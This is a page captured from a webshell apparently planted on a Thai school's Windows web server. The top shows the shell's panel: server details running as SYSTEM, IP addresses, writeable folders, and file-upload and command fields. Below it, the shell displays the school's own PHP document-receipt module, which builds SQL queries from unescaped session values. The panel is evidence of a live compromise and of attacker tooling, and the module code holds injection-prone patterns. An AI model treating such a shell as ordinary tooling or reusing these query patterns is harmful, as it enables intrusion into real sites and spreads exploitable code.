403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/myschool/nongpho/modules/tkk9/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /Inetpub/www/myschool/nongpho/modules/tkk9/checkbook.php
<script type="text/javascript">
function showemotion() {
	emotion1.style.display = 'none';
	emotion2.style.display = '';
}
function closeemotion() {
	emotion1.style.display = '';
	emotion2.style.display = 'none';
}

function emoticon(theSmilie) {

	document.form2.COMMENT.value += ' ' + theSmilie + ' ';
	document.form2.COMMENT.focus();
}
</script>
	<TABLE cellSpacing=0 cellPadding=0 width=400 border=0>
        <TR>
       </TD>
          <TD >
<?
$_GET['id'] = intval($_GET['id']);
//แสดงข่าวสาร/ประชาสัมพันธ์ 
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$res[tkk9] = $db->select_query("SELECT * FROM ".TB_TKK9." WHERE id='".$_GET[id]."' ");
$arr[tkk9] = $db->fetch($res[tkk9]);
$db->closedb ();
if(!$arr[tkk9][id]){
	echo "<BR><BR><BR><BR><CENTER><IMG SRC=\"images/icon/notview.gif\" BORDER=\"0\" ><BR><BR><B>ไม่มีเรื่อง</B></CENTER><BR><BR><BR><BR>";
}else{
	$Filetkk9Topic = "tkk9data/".$arr[tkk9][post_date].".txt";
	$file_open = @fopen($Filetkk9Topic, "r");
	$content = @fread ($file_open, @filesize($Filetkk9Topic));
	$Detail = stripslashes(FixQuotes($content));
	//ทำการเพิ่มจำนวนคนเข้าชม
	$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
	$q[Pageview] = "UPDATE ".TB_TKK9." SET pageview = pageview+1 WHERE id = '".$_GET[id]."' ";
	$sql[Pageview] = mysql_query ( $q[Pageview] ) or sql_error ( "db-query",mysql_error() );
	
	$db->closedb ();
?>
					<table width="400" border="0" cellspacing="0" cellpadding="0">
	<tr>
<td width="200" valign="top"bgcolor="#FFFFCC"><B><FONT COLOR="#990000" size=2>
<?

if($_SESSION['user_user']){
	//Admin Login Show Icon
?>
				  <a href="javascript:Confirm('?name=tkk9&file=addbook&op=tkk9_del&id=<? echo $arr[tkk9][id];?>&prefix=<? echo $arr[tkk9][post_date];?>','คุณมั่นใจในการลบหัวข้อนี้ ?');"><img src="images/admin/trash.gif"  border="0" alt="ลบ" >ลบ</a>
<?
}
?>
</FONT></B></td>
				  <tr>
    <td width="400" bgcolor="#00ffcc" colspan="5"><B><FONT COLOR="#000066" size=2>เรื่อง : <?=$arr[tkk9][topic];?> (<?=$arr[tkk9][pageview];?>)</B><BR><BR>
	<?
					 if($arr[tkk9][full_text]){ 	  
?>
<a href="tkk9/<?=$arr[tkk9][full_text];?>" target="_blank"><b>ไฟล์ที่ 1</b></A>
		  <? } else {
		 echo "";
	 }?>
	 <?
					 if($arr[tkk9][full_texts]){ 	  
?>
<a href="tkk9/<?=$arr[tkk9][full_texts];?>" target="_blank"><b>ไฟล์ที่ 2</b></A>
		  <? } else {
		 echo "";
	 }?>
	 <?
					 if($arr[tkk9][full_textu]){ 	  
?>
<a href="tkk9/<?=$arr[tkk9][full_textu];?>"target="_blank"><b>ไฟล์ที่ 3</b></A>
		  <? } else {
		 echo "";
	 }?>
	 <?
					 if($arr[tkk9][full_texto]){ 	  
?>
<a href="tkk9/<?=$arr[tkk9][full_texto];?>"target="_blank"><b>ไฟล์ที่ 4</b></A>
		  <? } else {
		 echo "";
	 }?></td>
				 <tr>
	 <td valign="top" align="center" bgcolor="#00ff99" ><FONT COLOR="#990000" size=2>ผู้ที่รับหนังสือแล้ว</font><br><br>
	 <TABLE cellSpacing=0 cellPadding=0 width=200 valign="top"border=0 align="center" >
<?	
	$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
	$res[comment] = $db->select_query("SELECT * FROM ".TB_TKK9_COMMENT." WHERE tkk9_id='".$arr[tkk9][id]."' ORDER BY id ");
	$count=0;
	while($arr[comment] = $db->fetch($res[comment])){
		$count  ++;
		
?>	
<tr>
<td>
<FONT COLOR="#000066" size=2><center><?=$arr[comment][name];?></center></font>
</td>
  </tr>
 
<?
}
?>
	<?
}$db->closedb ();
?>	<!-- Enable Comment -->
 </table>
 </td>
  </tr>
<?
//CheckUser($_SESSION['admin_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[admin] = $db->select_query("SELECT * FROM ".TB_ADMIN." WHERE username='".$_SESSION['admin_user']."' ");
		$arr[admin] = $db->fetch($res[admin]);

//CheckUser($_SESSION['user_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$arr[user] = $db->fetch($res[user]);
		?>
			<TABLE bgcolor="#00ffcc" cellSpacing=0 cellPadding=0 width=400 border=0 align="center">
			  <TBODY>				
				  <TD>
						<FORM NAME="form2" METHOD=POST ACTION="?name=tkk9&file=comment&id=<?=$_GET[id];?>">
						<TABLE cellSpacing=0 cellPadding=0 width=400 border=0 align="center">						
						<TR>
							<TD align="center"><INPUT TYPE="hidden" NAME="NAME" style="width:150" VALUE="<?=$arr[admin][name];?> <?=$arr[user][name];?> "  readonly style=\"color: #FF0000" ><br><INPUT TYPE="submit" value=" บันทึกลงทะเบียนรับ ">
							</TD>
						</TR>
						</TABLE>
						</FORM>

			</TABLE>
			<!-- End tkk9 -->	
			
		  </TD>
        </TR>
      </TBODY>
    </TABLE>

Youez - 2016 - github.com/yon3zu
LinuXploit